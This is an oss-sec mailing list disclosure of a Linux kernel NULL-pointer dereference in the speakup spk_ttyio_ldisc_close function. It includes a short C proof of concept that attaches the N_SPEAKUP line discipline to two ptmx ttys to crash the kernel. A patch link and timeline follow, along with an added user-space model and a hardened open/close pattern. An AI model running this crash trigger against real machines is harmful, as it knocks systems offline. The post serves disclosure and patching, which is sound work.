oss-sec mailing list archives

Linux kernel NULL-ptr deref bug in spk_ttyio_ldisc_close


From: Shisong Qin <qinshisong1205 () gmail com>
Date: Thu, 19 Nov 2020 10:46:59 +0800

Hi,

Recently we found a NULL-ptr deref BUG in spk_ttyio.c in the longterm 4.19
Linux kernel, and it could also be triggered in the 5.9 Linux kernel. In
function spk_ttyio_ldisc_close, it would free the "speakup_tty->disc_data"
and set "speakup_tty" to NULL. However, if we open two tty devices, use
tiocsetd() to set them as "speakup_tty" and close them in turn, the first
close would set "speakup_tty" to NULL, and the second close would try to
dereference "speakup_tty", leading to a NULL-ptr deref crash.

This bug could be reproduced in the longterm 4.19 Linux kernel with
CONFIG_STAGING=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y.
To reproduce it in the 5.9 Linux kernel, CONFIG_ACCESSIBILITY=y is also
required in config, and here is a simple poc:

#define _GNU_SOURCE

#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>   /* needed for ioctl(); missing from the original */
#include <unistd.h>

int main(void) {
    /* Line discipline number 0x1a (26) is N_SPEAKUP. */
    int disc = 0x1a;
    /* 0x5423 is TIOCSETD on x86: attach the line discipline to the tty. */
    int fd = open("/dev/ptmx", O_RDWR, 0);
    ioctl(fd, 0x5423, &disc);
    int fd2 = open("/dev/ptmx", O_RDWR, 0);
    ioctl(fd2, 0x5423, &disc);
    /* Both fds are closed implicitly at process exit, which runs
       spk_ttyio_ldisc_close twice. */
    return 0;
}

After the process returns, it seems the automatic call to release would
trigger the NULL-ptr deref bug.

Here is the commit to patch this BUG:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=d4122754442799187d5d537a9c039a49a67e57f1

Timeline:
* 2020/11/10 - Vulnerability reported to security () kernel org
* 2020/11/11 - Vulnerability confirmed, and reported to
linux-distros () vs openwall org.
* 2020/11/19 - Vulnerability opened.

Thanks,
Shisong Qin and Bodong Zhao, Tsinghua University
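The following is an added user-space model of the lifecycle described in the report; it is not kernel code, not the posted PoC, and not the content of the linked commit. It assumes a single global owner pointer (named speakup_tty here, after the report) and shows, side by side, the shape that breaks on the open/open/close/close sequence and one hardening pattern (refuse a second open, and let close act only on the tty that actually owns the discipline). The hardened variant is an illustration of a defensive pattern, not a claim about how the upstream fix is written.

```c
/* User-space model of a line-discipline open/close pair that shares one
 * global pointer. Constructed example; none of this is kernel code. */
#include <errno.h>
#include <stdlib.h>

struct spk_ldisc_data { int placeholder; };          /* stand-in for per-tty state */
struct tty_struct   { void *disc_data; };            /* stand-in for the kernel tty */

/* Single global, modelled after the speakup_tty global named in the report. */
static struct tty_struct *speakup_tty;

/* --- Vulnerable shape: open always takes the global, close always uses it --- */
static int ldisc_open_vuln(struct tty_struct *tty)
{
    tty->disc_data = calloc(1, sizeof(struct spk_ldisc_data));
    if (!tty->disc_data)
        return -ENOMEM;
    speakup_tty = tty;          /* second open silently overwrites the first */
    return 0;
}

/* Returns 1 where the kernel would dereference NULL; we report instead of crashing. */
static int ldisc_close_vuln(struct tty_struct *tty)
{
    (void)tty;                  /* the close ignores which tty is being closed */
    if (speakup_tty == NULL)
        return 1;               /* <-- the NULL-ptr deref from the report */
    free(speakup_tty->disc_data);
    speakup_tty->disc_data = NULL;
    speakup_tty = NULL;         /* first close clears the global for everyone */
    return 0;
}

/* --- Hardened shape: one owner at a time, close only for the owner --- */
static int ldisc_open_safe(struct tty_struct *tty)
{
    if (speakup_tty)
        return -EBUSY;          /* discipline already attached elsewhere */
    tty->disc_data = calloc(1, sizeof(struct spk_ldisc_data));
    if (!tty->disc_data)
        return -ENOMEM;
    speakup_tty = tty;
    return 0;
}

static int ldisc_close_safe(struct tty_struct *tty)
{
    if (tty != speakup_tty)
        return 0;               /* not the owner (or nothing attached): no-op */
    free(tty->disc_data);
    tty->disc_data = NULL;
    speakup_tty = NULL;
    return 0;
}

/* Drive the PoC sequence (open A, open B, close A, close B) against a given
 * open/close pair. Returns 1 if any close hit the NULL dereference path,
 * and stores the return code of the second open in *second_open_rc. */
int run_sequence(int (*open_fn)(struct tty_struct *),
                 int (*close_fn)(struct tty_struct *),
                 int *second_open_rc)
{
    struct tty_struct a = { 0 }, b = { 0 };
    int crashed;

    speakup_tty = NULL;
    open_fn(&a);
    *second_open_rc = open_fn(&b);
    crashed = close_fn(&a);
    crashed |= close_fn(&b);

    /* release anything the vulnerable path leaked so the model stays clean */
    free(a.disc_data);
    free(b.disc_data);
    return crashed;
}
```

With the vulnerable pair, the first close tears down the state that the second tty still refers to and clears the global, so the second close reads through NULL. With the hardened pair, the second open is rejected with -EBUSY and each close checks ownership before touching shared state, so closing both ttys in any order is safe.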
